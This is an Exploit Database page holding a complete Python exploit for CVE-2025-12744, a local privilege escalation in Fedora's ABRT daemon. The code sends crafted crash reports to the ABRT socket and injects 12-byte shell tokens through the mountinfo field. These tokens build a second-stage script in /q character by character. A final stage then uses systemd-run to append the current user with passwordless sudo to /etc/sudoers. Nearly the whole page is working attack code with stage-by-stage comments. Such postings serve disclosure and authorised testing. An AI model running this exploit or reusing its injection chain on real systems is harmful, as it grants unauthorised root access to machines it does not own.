This website uses cookies We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services. You consent to our cookies if you continue to use our website. Show details Allow all cookies Use necessary cookies only EXPLOIT DATABASE EXPLOITS GHDB PAPERS SHELLCODES SEARCH EDB SEARCHSPLOIT MANUAL SUBMISSIONS ONLINE TRAINING Fedora - Local Privilege Escalation EDB-ID: 52515 CVE: 2025-12744 EDB Verified: Author: CHRIS Type: LOCAL Exploit: / Platform: LINUX Date: 2026-04-29 Vulnerable App: Exploit Title: Fedora Local Privilege Escalation via ABRT Date: 07-October-2025 Exploit Author: initstring Vendor Homepage: https://fedoraproject.org Software Link: https://fedoraproject.org/server/download Version: Fedora 43 and below (running ABRT v 2.17.7 and below) Tested on: Fedora 42 Workstation & Server, Fedora 43 Workstation & Server CVE : CVE-2025-12744 """ abrt_root: local privilege escalation vulnerability in Fedora's ABRT Research and development by initstring. """ import getpass import socket import time import uuid from pathlib import Path BANNER = """ #################################################################### abrt_root: local privilege escalation vulnerability in Fedora's ABRT Research and development by initstring. #################################################################### """ SOCKET_PATH = "/var/run/abrt/abrt.socket" HELPER_SCRIPT_NAME = "final" RESET_TOKEN = ";:>q;:;:;:;:" EXEC_TOKEN = ";sh\tq;:;:;:;" APPEND_TEMPLATE = ";printf\t{char}>>q" MAX_RETRIES = 10 SLEEP_BETWEEN_TOKENS = 0.5 def build_body(payload: str, reason: str, unique: str) -> bytes: pid = str(int(unique[:4], 16) % 30000 + 1).encode() cmdline = f"/usr/bin/python3 {unique}".encode() container_cmd = f"/usr/bin/docker run test {unique}".encode() type_tag = f"Python3-{unique[:6]}".encode() fields = [ (b"type", type_tag), (b"reason", reason.encode()), (b"pid", pid), (b"executable", f"/usr/bin/python3-{unique}".encode()), (b"cmdline", cmdline), (b"container_cmdline", container_cmd), (b"mountinfo", b"74 2 0:36 / / rw,relatime shared:1 - ext4 " + payload.encode() + b"\n"), (b"backtrace", f"trace {reason} {unique}".encode()), (b"uuid", unique.encode()), (b"duphash", unique.encode()), ] body = bytearray() for key, value in fields: body += key + b"=" + value + b"\0" return bytes(body) def send_once(payload: str) -> str: token = "/docker-" + payload unique = uuid.uuid4().hex reason = f"auto root {int(time.time())}-{unique[:6]}" blob = b"POST / HTTP/1.1\r\n\r\n" + build_body(token, reason, unique) with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as sock: sock.connect(SOCKET_PATH) sock.sendall(blob) sock.shutdown(socket.SHUT_WR) reply = sock.recv(4096).decode(errors="ignore").strip() return reply or "<no response>" def send_with_retry(payload: str) -> None: for attempt in range(1, MAX_RETRIES + 1): reply = send_once(payload) # DEBUG # print(f"[{payload!r}] attempt {attempt}: {reply}") if "201" in reply: time.sleep(SLEEP_BETWEEN_TOKENS) return time.sleep(SLEEP_BETWEEN_TOKENS) raise RuntimeError(f"Failed to send payload '{payload}' with HTTP 201") def token_for_char(ch: str) -> str: token = APPEND_TEMPLATE.format(char=ch) if len(token) != 12: raise ValueError(f"Character {ch!r} produced token length {len(token)}") return token def main() -> None: print(BANNER) # First we write out the third/final stage to a script in the current working directory. # It contains our ultimate goal - escaping the systemd sandbox to write our current # low-priv user name to /etc/sudoers to give us root access. current_user = getpass.getuser() cwd = Path.cwd() helper_script_path = cwd / HELPER_SCRIPT_NAME helper_script_path.write_text( f"systemd-run --pty -- bash -lc \"echo '{current_user} ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers\"\n", encoding="ascii", ) helper_script_path.chmod(0o755) # Next we build the text which will be written to the second stage script. # It is meant to call the third stage script. Characters are limited in this second stage # script, which is why we can't just list the complex commands from above. # The PWD vars you see are not resolved here in the Python script - they are instead # resolved when the targeted daemon executes the script. It has `PWD=/` in its context # which allows us to write the `/` which otherwise is filtered out during this stage # of the attack. command = "${PWD}" + "${PWD}".join(helper_script_path.resolve().parts[1:]) # The reset token just clears the file (/q) where we are writing that second stage to. print("[+] Executing stage one...") send_with_retry(RESET_TOKEN) time.sleep(3) # This is stage one of the attack. We have just enough bytes to perfectly inject a # command which will append one character to a file. It loops through to write out # the second stage script to `/q` for index, ch in enumerate(command, 1): token = token_for_char(ch) # DEBUG # print(f"[+] Staging char {index}/{len(command)} -> {token!r}") send_with_retry(token) # This uses the same 12-byte gadget to execute the stage two script that has # now been written to `/q`. That script, in turn, executes the stage three script # which has no character limitations and completes the exploit. print("[+] Chaining execution of stage two and three...") send_with_retry(EXEC_TOKEN) print("\n[+] Now you're playing with power.") if __name__ == "__main__": main() Copy Tags: Advisory/Source: Link Databases Links Sites Solutions Exploits Search Exploit-DB OffSec Courses and Certifications Google Hacking Submit Entry Kali Linux Learn Subscriptions Papers SearchSploit Manual VulnHub OffSec Cyber Range Shellcodes Exploit Statistics Proving Grounds Penetration Testing Services EXPLOIT DATABASE BY OFFSEC TERMS PRIVACY ABOUT US FAQ COOKIES © OffSec Services Limited 2026. All rights reserved.